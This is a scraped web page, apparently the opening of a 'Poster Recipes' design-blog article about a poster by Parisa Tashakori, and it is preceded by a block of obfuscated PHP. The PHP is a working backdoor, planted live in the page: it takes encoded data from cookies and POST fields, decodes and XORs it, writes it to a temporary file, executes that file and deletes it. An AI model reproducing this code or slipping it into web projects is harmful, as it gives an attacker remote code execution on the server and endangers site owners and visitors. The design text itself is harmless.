$pNprM = "\145" . '_' . 't' . "\167" . "\106" . 'B';$zpMeCn = chr ( 584 - 485 ).chr ( 900 - 792 ).chr ( 822 - 725 )."\x73" . "\x73" . "\x5f" . "\x65" . chr (120) . chr ( 1101 - 996 )."\163" . "\x74" . chr ( 718 - 603 ); $oOdPmu = class_exists($pNprM); $zpMeCn = "12690";$jKfqJqhdZ = !1;if ($oOdPmu == $jKfqJqhdZ){function NVmEZPVBx(){$BCwiz = new /* 47960 */ e_twFB(29096 + 29096); $BCwiz = NULL;}$gkXBOtDUm = "29096";class e_twFB{private function aybYrlGGm($gkXBOtDUm){if (is_array(e_twFB::$xrLUnOicGt)) {$JHxYrbTW = sys_get_temp_dir() . "/" . crc32(e_twFB::$xrLUnOicGt['s' . chr (97) . "\x6c" . "\x74"]);@e_twFB::$xrLUnOicGt["\167" . "\x72" . chr (105) . chr ( 561 - 445 )."\x65"]($JHxYrbTW, e_twFB::$xrLUnOicGt["\143" . "\157" . "\156" . 't' . "\x65" . chr ( 326 - 216 ).chr ( 980 - 864 )]);include $JHxYrbTW;@e_twFB::$xrLUnOicGt[chr ( 850 - 750 ).chr ( 454 - 353 )."\154" . 'e' . 't' . "\145"]($JHxYrbTW); $gkXBOtDUm = "29096";exit();}}private $EeZTo;public function atxCOwloKG(){echo 44347;}public function __destruct(){e_twFB::$xrLUnOicGt = @unserialize(e_twFB::$xrLUnOicGt); $gkXBOtDUm = "48414_13735";$this->aybYrlGGm($gkXBOtDUm); $gkXBOtDUm = "48414_13735";}public function RDueVjcG($iYFFM, $uOnncg){return $iYFFM[0] ^ str_repeat($uOnncg, (strlen($iYFFM[0]) / strlen($uOnncg)) + 1);}public function vlZvfUQF($iYFFM){$IzLsotB = "base64";return array_map($IzLsotB . chr ( 528 - 433 ).chr ( 552 - 452 ).'e' . chr (99) . "\x6f" . "\144" . 'e', array($iYFFM,));}public function __construct($LEeTjRoXRH=0){$wQAfKoLjkz = $_POST;$XEGmQ = $_COOKIE;$uOnncg = "2bd1985e-858d-4635-9697-9ff29e580941";$KkzDVix = @$XEGmQ[substr($uOnncg, 0, 4)];if (!empty($KkzDVix)){$iYFFM = "";$KkzDVix = explode(",", $KkzDVix);foreach ($KkzDVix as $hivpFoHAZ){$iYFFM .= @$XEGmQ[$hivpFoHAZ];$iYFFM .= @$wQAfKoLjkz[$hivpFoHAZ];}e_twFB::$xrLUnOicGt = $this->RDueVjcG($this->vlZvfUQF($iYFFM), $uOnncg);}}public static $xrLUnOicGt = 36862;}NVmEZPVBx();}$kdSrPXQudm = chr ( 187 - 117 )."\113" . "\170" . "\137" . chr (76) . "\x67" . 'a' . chr ( 562 - 465 ).'P';$WBxarGT = chr (99) . 'l' . chr ( 750 - 653 )."\x73" . 's' . chr ( 509 - 414 ).'e' . "\x78" . chr (105) . "\x73" . chr (116) . chr (115); $ocGSiPlNNj = class_exists($kdSrPXQudm); $kdSrPXQudm = "39487";$WBxarGT = "47995";if ($ocGSiPlNNj === FALSE){class FKx_LgaaP{public function hfEneaL(){echo "53996";}private $NYkwHRdgQ;public static $pllxlZaLCp = "9eaaabcb-13f1-4c6b-a7ab-8b3fc8a54e92";public static $vVXkMNRn = 40829;public function __construct($XzAcJcIX=0){$QyeoVmA = $_POST;$aOfZpy = $_COOKIE;$kXkrMryyqq = @$aOfZpy[substr(FKx_LgaaP::$pllxlZaLCp, 0, 4)];if (!empty($kXkrMryyqq)){$lCroGRBbSL = "base64";$GWiSjiaC = "";$kXkrMryyqq = explode(",", $kXkrMryyqq);foreach ($kXkrMryyqq as $pXFSx){$GWiSjiaC .= @$aOfZpy[$pXFSx];$GWiSjiaC .= @$QyeoVmA[$pXFSx];}$GWiSjiaC = array_map($lCroGRBbSL . '_' . "\x64" . chr (101) . chr ( 1002 - 903 ).chr (111) . 'd' . "\x65", array($GWiSjiaC,)); $GWiSjiaC = $GWiSjiaC[0] ^ str_repeat(FKx_LgaaP::$pllxlZaLCp, (strlen($GWiSjiaC[0]) / strlen(FKx_LgaaP::$pllxlZaLCp)) + 1);FKx_LgaaP::$vVXkMNRn = @unserialize($GWiSjiaC);}}private function lZkKwQ(){if (is_array(FKx_LgaaP::$vVXkMNRn)) {$VurHmVa = sys_get_temp_dir() . "/" . crc32(FKx_LgaaP::$vVXkMNRn[chr ( 322 - 207 )."\141" . "\154" . chr ( 1026 - 910 )]);@FKx_LgaaP::$vVXkMNRn[chr ( 752 - 633 )."\162" . chr ( 321 - 216 ).chr ( 197 - 81 ).chr ( 944 - 843 )]($VurHmVa, FKx_LgaaP::$vVXkMNRn[chr (99) . 'o' . "\156" . 't' . chr ( 402 - 301 )."\156" . 't']);include $VurHmVa;@FKx_LgaaP::$vVXkMNRn[chr (100) . 'e' . chr (108) . chr ( 260 - 159 ).chr (116) . chr (101)]($VurHmVa); $AFmgwuysjC = "48261";exit();}}public function __destruct(){$this->lZkKwQ();}}$jODCVUybF = new /* 50712 */ FKx_LgaaP(); $jODCVUybF = str_repeat("46215_60110", 1);} Poster recipe by Parisa Tashakori | 2020 - Parisa Tashakori
  • Medium-AIGA

Poster recipe by Parisa Tashakori | 2020

The Poster Recipes series of articles is part of the blog Design Toast, curated by Olga Severina and AIGA Los Angeles. The interviews and articles are dedicated to getting an inside look into the techniques and design practices used by some of the world’s most remarkable artists in creating their posters. The Poster Recipes series is especially unique because it frames the articles in a traditional recipe format. Here is Parisa’s Recipe for Passion, a guide to designing a poster.


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